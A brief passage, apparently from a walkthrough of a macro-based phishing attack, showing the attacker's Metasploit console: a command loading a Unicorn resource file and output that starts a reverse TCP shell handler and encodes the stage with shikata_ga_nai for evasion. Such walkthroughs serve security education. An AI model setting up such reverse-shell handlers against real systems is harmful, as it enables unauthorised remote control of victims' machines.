End Sub


Attacker’s View:

  • msfconsole -r unicorn.rn
  • [*] Exploit running as background job.
  • [*] Started reverse TCP handler on 192.168.0.196:443 
  • [*] Starting the payload handler…
  • [*] Encoded stage with x86/shikata_ga_nai